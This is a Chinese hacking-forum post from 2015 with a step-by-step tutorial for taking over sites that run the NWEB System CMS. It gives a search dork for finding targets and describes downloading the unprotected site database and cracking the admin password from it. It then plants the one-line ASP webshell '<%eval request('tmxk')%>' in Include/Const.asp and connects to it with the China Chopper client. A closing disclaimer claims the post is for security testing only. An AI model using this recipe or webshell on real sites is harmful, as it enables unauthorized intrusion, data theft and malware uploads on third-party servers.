天马行空工作室

 找回密码
 加入天马
搜索
查看: 2718|回复: 2

[中国] 记一次万博企业网站系统(NWEB System)后台拿Webshell

[复制链接]
发表于 2015-4-12 10:41:26 | 显示全部楼层 |阅读模式
本人技术不是太好,文章写的不好的地方还请大家见谅。

万博企业网站系统(NWEB System)

关键字:inurl:system/adminlogin.asp

后台地址:http://域名/system/adminlogin.asp

数据库地址:http://域名/Database/NwebCn_Site.mdb


‘网站数据:/Database/NwebCn_Site.mdb (常规内容数据库)
‘     /Database/Bak_NwebCn_Site.mdb (备份内容数据库)
‘     /Database/NwebCn_Stat.mdb (常规流量数据库)
‘     /Database/Bak_NwebCn_Stat.mdb (备份流量数据库)
‘常量配置:/Include/Const.asp (如果你更改过数据库存放路径或文件名,相应常量在此文件作修改)

利用文件:http://域名/Include/Const.asp

利用代码:<%eval request("tmxk")%>

1.打开目标站点



2.在目标站点后面加上  /Database/NwebCn_Site.mdb  下载站点数据库,也就是:http://域名/Database/NwebCn_Site.mdb



3.打开数据库解密文



4.获取明文后登录后台





5.在左侧菜单选择“系统管理”→“常规设置”



6.重点来了  在哪里? 你们懂得
就是一句话  看到没   我们把双引号里面的c改成tmxk  然后保存



7.菜刀连接地址出来了



8.菜刀连接地址:http://域名/Include/Const.asp
我们直接打开是个空白页  你们都懂


9.既然是空白页  那我们就用菜刀连接试试



10.连接成功



数据还有点多的




网马什么的就不一一截图出来了,经测试,可直接上传小马、大马等,貌似服务器没装防火墙,教程到此结束,谢谢!

友情提示此次教程仅出于安全检测,借鉴此帖者,成功渗透某些站点后切勿随便修改网站程序,以免带来不必要的麻烦!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?加入天马

x
发表于 2015-4-20 10:44:44 | 显示全部楼层
数据库地址是怎么猜出来的
您需要登录后才可以回帖 登录 | 加入天马

本版积分规则

Archiver|手机版|小黑屋|天马行空工作室 ( 京ICP备12003429号  

GMT+8, 2018-12-18 21:20 , Processed in 0.392558 second(s), 20 queries .

Powered by Discuz! v8

© 2010-2014 记一次万博企业网站系统(NWEB System)后台拿Webshell - 区域安全 天马行空工作室

快速回复 返回顶部 返回列表